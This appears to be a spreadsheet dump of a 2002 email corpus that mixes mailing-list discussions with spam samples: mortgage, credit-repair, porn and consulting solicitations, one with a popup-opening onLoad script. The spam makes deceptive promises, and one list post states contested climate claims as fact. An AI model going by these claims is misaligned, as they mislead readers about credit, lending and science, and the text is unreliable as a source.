 	&lt;META NAME="GENERATOR" Content="Visual Page 1.0 for Windows"&gt;
 	&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1"&gt;
 	&lt;TITLE&gt;untitled&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY onLoad="(window.open('http://e-investmentoptions.com/mtg/'))"&gt;
 &lt;P ALIGN="CENTER"&gt;&lt;FONT COLOR="#0000FF" face="Arial"&gt;&lt;B&gt;Get Your No Cost Mortgage Quotes Here&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR="#000000" face="Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT face="Arial"&gt;&lt;B&gt;Let The Banks Compete For Your Mortgage Loan.&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR="#000000" face="Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT COLOR="#FF0000" face="Arial"&gt;&lt;B&gt;We Have Loans For Every Credit Situation!!.&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P ALIGN="CENTER"&gt;&lt;FONT COLOR="#FF0000" face="Arial"&gt;&lt;B&gt;&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;A HREF="http://e-investmentoptions.com/mtg/"&gt;&lt;FONT face="Arial"&gt;&lt;B&gt;Click Here Now!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters &lt;tim.one@comcast.net&gt; is all like:
 &gt; [Tim]
 &gt; &gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
 &gt; &gt; approaching 10 million bytes.
 &gt; 
 &gt; That shrinks to under 2 million bytes, though, if I delete all the WordInfo
 &gt; records with spamprob exactly equal to UNKNOWN_SPAMPROB.  Such records
 &gt; aren't needed when scoring (an unknown word gets a made-up probability of
 &gt; UNKNOWN_SPAMPROB).  Such records are only needed for training; I've noted
 &gt; before that a scoring-only database can be leaner.
 That's pretty good.  I wonder how much better you could do by using some
 custom pickler.  I just checked my little dbm file and found a lot of
 what I would call bloat:
   &gt;&gt;&gt; import anydbm, hammie
   &gt;&gt;&gt; d = hammie.PersistentGrahamBayes("ham.db")
   &gt;&gt;&gt; db = anydbm.open("ham.db")
   &gt;&gt;&gt; db["neale"], len(db["neale"])
   ('ccopy_reg\n_reconstructor\nq\x01(cclassifier\nWordInfo\nq\x02c__builtin__\nobject\nq\x03NtRq\x04(GA\xce\xbc{\xfd\x94\xbboK\x00K\x00K\x00G?\xe0\x00\x00\x00\x00\x00\x00tb.', 106)
   &gt;&gt;&gt; d.wordinfo["neale"], len(`d.wordinfo["neale"]`)
   (WordInfo'(1031337979.16197, 0, 0, 0, 0.5)', 42)
 Ignoring the fact that there are too many zeros in there, the pickled
 version of that WordInfo object is over twice as large as the string
 representation.  So we could get a 50% decrease in size just by using
 the string representation instead of the pickle, right?
 Something about that logic seems wrong to me, but I can't see what it
 is.  Maybe pickling is good for heterogeneous data types, but every
 value of our big dictionary is going to have the same type, so there's a
 ton of redundancy.  I guess that explains why it compressed so well.
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save now                     
</t>
  </si>
  <si>
    <t xml:space="preserve">*****Write down*****
 Hello ,
 It is time to refinance!
 Your credit does not matter, we can approve anyone.
 Now is the time to let some of the top mortgage companies 
 in the country compete for your business. 
 If you have good credit we will give you the most amazing 
 rates available anywhere! 
 If you have poor credit, don't worry! We can still refinance 
 you with the most competitive rates in the industry!
 Let Us put Our Expertise to Work for You! Guaranteed!
 http://21377@www.top-lenders.com/app
 Best,
 Top-Lenders
 Erase
 http://21631@www.top-lenders.com/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Scientists prove that shoe size and penis size are not linked.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406746,1717/
 Date: 2002-09-30T20:19:11+01:00
 [IMG: http://www.newsisfree.com/Images/fark/reuters.gif ([Reuters])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RSS revolt
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#rss_revolt
 Date: 2002-09-25T00:38:31-05:00
 _Anil Dash_: XML version 1.0[1]. &amp;#8220;Why isn't there a way to syndicate my 
 words without butchering the way they look?&amp;#8221; Several people protested 
 last week by changing their weblog templates to something like this[2]. Jason 
 Levine has more links[3] to those involved. I spoke with one of the people who 
 implemented it, and she claims it wasn't a protest as such, more of an inside 
 joke. Point taken: the entire point of an aggregator (and syndication in 
 general) is to make everyone's words look the same. Counterpoint: the default 
 in most weblog systems is to only publish excerpts in RSS feeds; nobody's 
 forcing you to publish full posts. This would probably be a good place to 
 insert a Zen quote about attachment, but my mind is too fuzzy to find it. 
 _Timothy Appnel_: More FFKAR, RDF, and FOAF[4]. FFKAR is &amp;#8220;the format 
 formerly known as RSS&amp;#8221;. Sam has already implemented it[5]. 
 _Nicholas Avenell_: ESF[6]. &amp;#8220;Are you also fed up with the continuing war 
 between RSS 0.9* and 1.0 and 2.0 and whatever else they invent today? Me too. 
 So today I invented the Epistula Syndication Format. ESF. It isn't XML. It 
 isn't RDF. It's just data.&amp;#8221; Sam[7] would love it, then. But Movable Type 
 doesn't support outputting dates in Unix timestamp format[8], which could be an 
 impediment to mainstream acceptance. 
 _Shelley Powers_: Consumer Rights and RSS[9]. &amp;#8220;I'm not buying into RSS 
 0.9x. I'm not buying into RSS 2.0. I'm not buying into RSS 1.0. I changed my 
 RSS 0.91 and RSS 1.0 templates to read the following:&amp;#8221; 
     *RSS not supported here* 
     This weblog does not support RSS 0.9x, RSS 2.0, or RSS 1.0. If you wish to 
     view entries, may I suggest that you visit the weblog, and save your fast 
     skimming for the New York Times and Wall Street Journal. 
 I'm sure this is some sort of DMCA violation or something, but here goes: 
     import urllib, re; print "\n TITLE: Burningbird
     \n http://weblog.burningbird.net/\n en-us\n \n" + "\n".join(["TITLE: %s
     %s" % t for t in re.compile(r'dc:title="(.*?)"\s*dc:identifier="(.*?)"', 
     re.DOTALL).findall(urllib.urlopen('http://weblog.burningbird.net/').read())]) 
     + "" 
 [1] http://www.dashes.com/anil/index.php?archives/003183.php
 [2] http://www.dashes.com/anil/xmlindex.php
 [3] http://q.queso.com/index.php?archives/001000.php
 [4] http://www.mplode.com/tima/archives/000107.html
 [5] http://www.intertwingly.net/blog/840.html
 [6] http://www.aquarionics.com/nodes/view.php?name=esf
 [7] http://www.intertwingly.net/blog/
 [8] http://www.movabletype.org/docs/mtmanual_tags.html#date tag formats
 [9] http://weblog.burningbird.net/archives/000544.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Re: Reporting....
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --1yeeQ81UyVL57Vl7
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Tue, Jul 23, 2002 at 09:37:33AM -0500, Joel Epstein wrote:
 | I currently have spam being filtered for about 50 users via spamd.=20
 | Works perfectly!  However, is there anyone out there providing reports=20
 | to their users about what was filetered?  Maybe just something like=20
 | date/time, From, and subject?
 I have such a system.  It works like this :
     1)  sa-exim scans the message during the SMTP interaction
     2)  if it scores high enough it is rejected
         2.1)    if it is rejected, exim mentions that in the reject log
         2.2)    if it isn't rejected it is delivered
             2.2.1)  it is up to the user to deal with (filter as
                     desired) the lower-scoring spam
     3)  I have a script run as a daily cron job to run through the
         reject log and deposit a report in the user's home directory
         indicating what was rejected and way (SA isn't the only cause
         for rejection)
 Obviously my setup is rather tied to exim and sa-exim, but if you want
 the reporting script I can send it to you.
 -D
 --=20
 Micros~1 :
  For when quality, reliability
   and security just aren't
    that important!
 =20
 http://dman.ddts.net/~dman/
 --1yeeQ81UyVL57Vl7
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iEYEARECAAYFAj098GMACgkQO8l8XBKTpRSdOwCgqJ0hH/x1kyhw8T4tcr2iO0bj
 fmIAn14hxwcq8fit2RZFidifHufuC9qF
 =2GIQ
 -----END PGP SIGNATURE-----
 --1yeeQ81UyVL57Vl7--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</si>
  <si>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[ILUG] putty + proxy goodness
</t>
  </si>
  <si>
    <t xml:space="preserve">Mornin' all,
 	I'm running one of the development snapshots of putty, and i just
 noticed a very handy new feature: builtin proxy support. This means that
 people like me can connect to external hosts using ssh via a http proxy.
 Nitfy.
 Steve
 -- 
 "Oh look, it's the Pigeon of Love."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 10:34 AM -0700 on 8/28/02, Jim Whitehead wrote:
 &gt; Great, this is half of what I'd need to become Spider Man! Now all I need to
 &gt; figure out is how to do that spider web shooting thing.
 ...That and be able to stick yourself upside down on a 20 foot ceiling from
 a standing jump...
 I remember someone recently doing the calculations in kilocalories required
 to be spiderman somewhere. Kind of like those flaming processor "analyses"
 done a couple of years ago...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</si>
  <si>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Amorous ostriches scoop Ig Nobel prize
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553540,1440/
 Date: Not supplied
 Research on scrotal asymmetry and the surface area of elephants were among 
 other recipients of the 2002 spoof awards
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Spam spam spam
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "D" == Damien Morton &lt;damien.morton@acm.org&gt; writes:
     D&gt; An alternative, which I have found very effective in reducing
     D&gt; my spam levels, is to reject emails to multiple or undisclosed
     D&gt; recipients, unless from someone in my whitelist (In this case,
     D&gt; subscribed members).
 I often use just such a posting to send emails to lists but also to
 send them to private individuals who need not be publically exposed on
 the list. This is what BCC is for.
 Where my spam filter draws the line is for emails which /only/ have
 undisclosed recipients, or an obviously bogus recipient.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOU ARE A WINNER!!
</t>
  </si>
  <si>
    <t xml:space="preserve"> fork@xent.com
 YOU WON A FREE PORN PASSWORD!!
 FREE PORN ACCESS ALL THE PORN YOU CAN HANDLE!!
 DO ME NOW I WANT YOU TO CUM!!!
   http://www.tnt-hosting.com/wmann
 to opt out click reply you will be removed instantly
 sbex^krag(pbz
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [NYT] A Sudden Rush to Declare Bankruptcy is Expected
</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne:
 &gt;I think his beef is that the laws for personal bankruptcy are being 
 &gt;rewritten without touching
 &gt;corporate bankruptcy, another example of how the legal construct known as a 
 &gt;"corporation"
 &gt;is treated more favorably than the non-legal construct known as a "human 
 &gt;being."
 Yeah, I get that. I just think this is a poor
 example. Corporate bankruptcy is a power fight
 between creditors, management, and shareholders
 over control of assets. Because a corporation is
 incorporeal (hee, hee), it can't be much else.
 If you're concerned about the imbalance of power
 related to corporations, I think the more relevant
 areas are tax structures, especially the income
 tax, various forms of externality, law related to
 employment, corporate transparency, and corporate
 governance.
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: FAQ: taint warnings from SA in /etc/procmailrc
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --wLAMOaPNJ0fu1fTG
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Wed, Aug 28, 2002 at 12:14:24AM +0100, Justin Mason wrote:
 &gt; actually, I think procmail supports this directly. use DROPPRIVS=3Dyes
 &gt; at the top of the /etc/procmailrc.
 Hey, look at that!
        DROPPRIVS   If  set  to	`yes'  procmail  will drop all privileges
 		   it might have had (suid or sgid).  This is only
 		   useful if you want to guarantee that the bottom half
 		   of  the /etc/procmailrc file is executed on behalf
 		   of the recipient.
 Of course, removing setuid/gid bits on programs that don't need it is
 always a good idea.  A general rule of system administration: don't give
 out permissions unless you absolutely need to.   ;)
 --=20
 Randomly Generated Tagline:
 "The cardinal rule at our school is simple. No shooting at teachers. If
  you have to shoot a gun, shoot it at a student or an administrator."
                  - "Word Smart II", from Princeton Review Pub.
 --wLAMOaPNJ0fu1fTG
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9bCkWAuOQUeWAs2MRAr+iAJ9cVLx61vWsC5KFDLYv9/T7FaZmxACgzUpC
 f235rrVr6cI8LvPC+IeIss0=
 =BsCM
 -----END PGP SIGNATURE-----
 --wLAMOaPNJ0fu1fTG--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SQL] Database joins
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_004E_01C2580D.1BC61260
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hi,
 I have created two databases, db1 and db2  in my POSTGRESQL database system.
 And both the databases contains few tables also.
 Could you please help me to write a query which should retrieve data from b=
 oth the databases
 (Database joins and table joins)
 Expecting and earliest reply
 Regards
 Jay
 ------=_NextPart_000_004E_01C2580D.1BC61260
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2719.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;Hi,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;I have created two databas=
 es,=20
 db1&amp;nbsp;and db2 &amp;nbsp;in my POSTGRESQL database system.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;And both the databases con=
 tains few=20
 tables also.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;Could you please help me t=
 o write a=20
 query which should retrieve data from both the databases&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;(Database joins and table=
 =20
 joins)&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;Expecting and earliest=20
 reply&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;Regards&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;Jay&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#800080 size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;=
 &lt;/HTML&gt;
 ------=_NextPart_000_004E_01C2580D.1BC61260--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tory leader risks all on 80s revival
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622116,215/
 Date: 2002-10-07T03:53:00+01:00
 Iain Duncan Smith will this week gamble his political future on a return to the 
 Thatcher revolution of the 80s.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] enter Chinese market
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam:
 Please reply to 
 Receiver: China Enterprise Management Co., Ltd. (CMC)
 E-mail: unido@chinatop.net
 As one technical organization supported by China Investment and Technical Promotion Office of United Nation Industry Development Organization (UNIDO), we cooperate closely with the relevant Chinese Quality Supervision and Standardization Information Organization. We provide the most valuable consulting services to help you to open Chinese market within the shortest time:
 1. Consulting Service on Mandatory National Standards of The People's Republic of China.
 2. Consulting Service on Inspection and Quarantine Standards of The People's Republic of China.
 3. Consulting Service for Permission to Enter Chinese Market
 We are very sorry to disturb you! 
 More information, please check our World Wide Web: http://www.chinatop.net
 Sincerely yours
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga wrote:
 &gt; And then there was the one from Prairie Home Companion:
 &gt; 
 &gt; Q. Why is a viola larger than a violin?
 &gt; A. It  just looks that way because a violin player's head is bigger.
 Suggested variation:
 Q. Why does the concertmaster play a smaller violin
     than the rest of the violinists?
 A. It just looks that way because his head is bigger.
 &amp;c&amp;c&amp;c
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 For anyone to fully bury global warming, they would have to bury the
 Greens.  A Green once said that if the Spotted Owl hadn't existed they
 would have had to invent it.  So it is with global warming.  Their
 fundamental opposition isn't to a warmer earth, it is to industrial
 civilization.
 The fact that the sattelites didn't match what the global warming
 theorists said should be there is old news.  The news here is that the
 temperature measures via sattelite have gotten even better and they have
 been validated with a different means of measurement.
 Rather than have to defend CO2 concentrations as not causing global
 warming, people who believe in CO2 need a good explanation of the
 "Medieval Warm Period".  Said period was warmer than what we have now,
 and it obvioiusly wasn't caused by CO2.
 In point of fact the predicted global warming due to CO2 is not caused
 DIRECTLY by CO2.  CO2 doesn't trap that much heat.  Water vapor does,
 and if you can get more water vapor in the air due to CO2 then you have
 your warming theory.
 Yet it would seem that the very stability of the earth's climate over
 long periods argues not for an unstable system with positive feedback
 loops but one where negative feedback loops predominate.
 More water vapor can increase temperatuers, but that also leads to more
 clouds.  Clouds both trap heat and reflect it, so it depends a great
 deal on how the cloud formation shakes out.  Most climate models admit
 they do clouds very poorly.
 A good link is:
 http://www.techcentralstation.be/2051/wrapper.jsp?PID=2051-100&amp;CID=2051-
 060302A
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Jim
 &gt; Whitehead
 &gt; Sent: Monday, September 23, 2002 12:23 PM
 &gt; To: Robert Harley; fork@example.com
 &gt; Subject: RE: Goodbye Global Warming
 &gt; 
 &gt; &gt; Gary Lawrence Murphy wrote:
 &gt; &gt; &gt;and say hello to the cool:  Oooo ... /this/ is going to cause
 &gt; &gt; some stir ...
 &gt; &gt;
 &gt; &gt; Of course not.  Some people just don't want to be confused by the
 facts.
 &gt; 
 &gt; For anyone to fully bury global warming, they would need to explain
 why
 &gt; the
 &gt; dramatic increase in CO2 concentrations are not increasing the global
 &gt; temperature. They would also need to explain why, worldwide, glaciers
 are
 &gt; melting faster than they have previously in the historical record.
 That
 &gt; is,
 &gt; people need more than refutations, they need a compelling alternate
 &gt; explanation (hint: climate variability doesn't cover all the bases).
 &gt; 
 &gt; - Jim
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not knocking dell in general, my next machine is going to be a dell. But
 buying a
 random dell box is likely to result in much tearing out of hair. 
 --B
 -----Original Message-----
 From: Stephen_Reilly@dell.com [mailto:Stephen_Reilly@dell.com]
 Sent: 02 August 2002 09:20
 To: ilug@linux.ie
 Subject: RE: [ILUG] Dell GX260 V Redhat 7.3
 &gt;&gt; I swear to god you have to be so carefull with dell machines 
 &gt;&gt; and linux. 
 ...
 &gt;&gt; to have some cheapo piece of hardware (eth card, modem, 
 &gt;&gt; sound, graphics )
 &gt;&gt; that is incompatable/unsupported. 
 ...
 &gt;&gt; with some crap
 &gt;&gt; dell machine that 
 yes, yes, all terribly insightful and extremely useful information.
 &gt; We just got some new Dell GX260 machines here are work and 
 &gt; I'm supposed to
 &gt; be putting Linux on them. I tried installing RedHat 7.3. It 
 &gt; just didn't want
 &gt; to know about the graphics card. I's an onboard Intel DVMT chip. No
 &gt; dedicated memory, it takes it from the onboard RAM.
 The onboard DVMT card has an Intel 845 G/GL chipset.
 http://www.intel.com/support/graphics/linux/ or
 http://www.intel.com/support/graphics/intel845g/linux.htm has more specific
 information. There is help available there.
 I also found somewhere (not through personal experience though) that
 2.4.19-pre10ac2 includes drivers for the chipset ?
 Steve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</si>
  <si>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Online Credit Repair,Approved by Bureaus!               24625
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;HEAD&gt;&lt;TITLE&gt;creditfix&lt;/TITLE&gt; 
 &lt;/HEAD&gt;&lt;BODY BGCOLOR=3D#FFFFFF TEXT=3D#000000 LINK=3D#FF0000 VLINK=3D#FF00=
 00 ALINK=3D#FF0000&gt;&lt;BR&gt;&lt;CENTER&gt; 
 &lt;TABLE WIDTH=3D400 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D1 BGCOLOR=3D99=
 9999&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE BORDER=3D0 CELLPADDING=3D4 CELLSPACING=3D0 BGCOLOR=3D#=
 FFFFFF BACKGROUND=3Dhttp://211.154.134.26/Z/creditfix/email/background_arr=
 ow.gif WIDTH=3D400&gt;&lt;TR&gt;&lt;TD&gt; 
               &lt;p align=3D"left"&gt;&lt;A HREF=3Dhttp://211.154.134.26/Z/creditfi=
 x/?cid=3D1600&amp;mid=3D17800&gt;&lt;IMG SRC=3Dhttp://211.154.134.26/Z/creditfix/ema=
 il/banner_email.gif BORDER=3D0&gt;&lt;/A&gt;&lt;BR&gt;
                 ..........................................................=
 .........................................................&lt;BR&gt;
                 &lt;font size=3D"2"&gt;&lt;b&gt;&lt;font face=3D"Georgia, Times New Roman=
 , Times, serif" color=3D"#999999" size=3D"3"&gt;&lt;br&gt;
                 You can now access and clear up bad credit online,&lt;br&gt;
                 directly from the convienience of you own computer.&lt;/font&gt;=
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;b&gt;&lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 size=3D"3" color=3D"#333333"&gt;Watch 
                 your credit daily with real time updates.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face=3D"Georgia, Times New Roman, Times, serif" siz=
 e=3D"2" color=3D"#666666"&gt;GET 
                 THE INFORMATION YOU NEED TO QUICKLY &amp;amp; EFFICIANTLY REMO=
 VE NEGATIVE 
                 CREDIT ITEMS FROM YOUR REPORT&lt;/font&gt;&lt;/p&gt;
               &lt;p align=3D"right"&gt;&lt;b&gt;&lt;font face=3D"Georgia, Times New Roman=
 , Times, serif" size=3D"3" color=3D"#FF0000"&gt;&lt;a href=3D"http://211.154.134=
 .26/Z/creditfix/?cid=3D1600&amp;mid=3D17800"&gt;&lt;font size=3D"4"&gt;. 
                 CLICK HERE FOR MORE INFORMATION .&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font s=
 ize=3D"4"&gt;&lt;a href=3D"http://211.154.134.26/Z/creditfix/?cid=3D1600&amp;mid=3D1=
 7800"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt; .........................................=
 .........................................................................=
 .&lt;BR&gt;
               &lt;br&gt;&lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obt=
 ained from a purchased list, Reference # 1600-17800.&amp;nbsp;&amp;nbsp;If you wis=
 h to unsubscribe from this list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your name into the remove box. If you have previously unsubscribed an=
 d are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Wa=
 y, Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt;&lt;BR&gt;
               ............................................................=
 ....................................................... 
               &lt;BR&gt;&lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc=
 . All Rights Reserved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD=
 &gt; 
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt; 
 &lt;/CENTER&gt;&lt;BR&gt; 
 &lt;/BODY&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the link - I'm fascinated by archaeology as well.
 ----- Original Message -----
 From: "James Rogers" &lt;jamesr@best.com&gt;
 To: &lt;fork@spamassassin.taint.org&gt;
 Sent: Monday, September 23, 2002 2:48 PM
 Subject: Re: Goodbye Global Warming
 I've seen articles on this type of stuff passing through various forums
 for several years.  I've always found archaeology interesting for no
 particular reason.  Here is a recent article from U.S. News that I
 actually still have in the dank recesses of my virtual repository.
 -James Rogers
  jamesr@best.com
 --------------------------------------------
 http://www.usnews.com/usnews/issue/020916/misc/16meltdown.htm
 Defrosting the past
 Ancient human and animal remains are melting out of glaciers, a bounty
 of a warming world
 BY ALEX MARKELS
 As he hiked near Colorado's Continental Divide in the summer of 2001, Ed
 Knapp noticed a strange shape jutting from a melting ice field at 13,000
 feet. "It looked like a bison skull," the building contractor and
 amateur archaeologist recalls. "I thought, 'That's strange. Bison don't
 live this high up.' "
 Knapp brought the skull to the Denver Museum of Nature and Science,
 where scientists last month announced that it was indeed from a
 bisonone that died about 340 years ago. "This was an extraordinary
 discovery," says Russ Graham, the museum's chief curator, adding that it
 could alter notions of the mountain environment centuries ago. "There's
 probably a lot more like it yet to be found."
 And not just bison. Colorado isn't the only place where glaciers and
 snowfields are melting. Decades of unusual warmth in regions from Peru
 to Alaskaa trend some think is linked to emissions from cars and
 industryhave shrunk or thawed many of the world's 70,000 glaciers. As
 the ice recedes, a treasure-trove of human and animal artifacts is
 emerging, extraordinarily well preserved after centuries in the deep
 freeze. The fabrics, wood, bone, and DNA-rich tissue found on the mucky
 fringes of the ice are revising scientists' understanding of our
 predecessors' health, habits, and technology, and the prey they pursued.
 "It's mind-boggling how many different fields are being advanced through
 studying these remains," says Johan Reinhard, a high-altitude
 archaeologist and explorer-in-residence at the National Geographic
 Society. Rare, spectacular finds like the frozen mummies he discovered
 in the Andes of Peru in the 1990s and the legendary 5,300-year-old "Ice
 Man," found at the edge of a receding glacier in the Alps in 1991, have
 offered time capsules of cultural and biological information. Now, as
 the ice continues to retreat, it is yielding not just occasional
 treasures but long records of humans and animals in the high mountains.
 Vanishing act. The trick is finding such specimens before Mother
 Natureand looterstake them first. Once uncovered, frozen remains can
 deteriorate within hours or be gnawed by animals. Moreover, they're
 often so well preserved when they emerge that people who come upon them
 don't even realize they're ancient.
 That was the case when three men hunting sheep near a high glacier in
 British Columbia, Canada, three years ago saw what they thought was a
 dead animal. "It looked a little like sealskin buried in the ice,"
 recalls Warren Ward, a teacher from nearby Nelson. "But when I looked
 closer I could see leather fringe from a coat and finger bones."
 Figuring they had found the remains of another hunter, or perhaps a fur
 trapper, the men stowed a flint knife and other artifacts in a Zip-Loc
 bag and delivered them to local officials. Archaeologists later exhumed
 the fallen hunter's body, along with a woven hat, fur clothing, and what
 seemed to be a medicine bag. Carbon dating revealed that the hunter
 lived about 550 years ago. Dubbed Kwaday Dan Ts'inchi, or Long Ago
 Person Found, by people of the Champagne and Aishihik First Nations (who
 may be his direct descendants), he is perhaps the best-preserved human
 from the period ever found in North America.
 Other findings from melting ice in the neighboring Yukon region could
 explain what that long-ago person was doing in the mountains in the
 first place. "Before this there was no archaeological record of people
 living here," says Greg Hare, a Yukon government archaeologist. "Now we
 see that this area was very much part of people's seasonal activities."
 Like Ward's discovery, the search began by chance, when Kristin Benedek
 caught a whiff of what smelled like a barnyard as she and her husband,
 Gerry Kuzyk, hunted sheep at 6,000 feet in the mountains of the south
 Yukon. They followed the scent to a melting patch of ice covered in
 caribou dung. "It was really odd, because I knew there hadn't been
 caribou in the area for at least 100 years," recalls Kuzyk, then a
 wildlife biologist with the Yukon government.
 Caribou cake. Returning a week later, he found "what looked like a
 pencil with string wrapped around it." It turned out to be a
 4,300-year-old atlatl, or spear thrower. Further investigation of the
 ice patchand scores of others around the regionrevealed icy layer
 cakes filled with caribou remains and human detritus chronicling 7,800
 years of changing hunting practices.
 Scientists now believe ancient caribou and other animals flocked to the
 ice each summer to cool down and escape swarming mosquitoes and flies.
 Hunters followed the game. They returned for centuries and discarded
 some equipment in the ice. "We've got people hunting with throwing darts
 up until 1,200 years ago," says Hare, who now oversees the research
 project. "Then we see the first appearance of the bow and arrow about
 1,300 years ago. And by 1,200 years ago, there's no more throwing
 darts."
 Now scientists are trying to make the search less a matter of luck. They
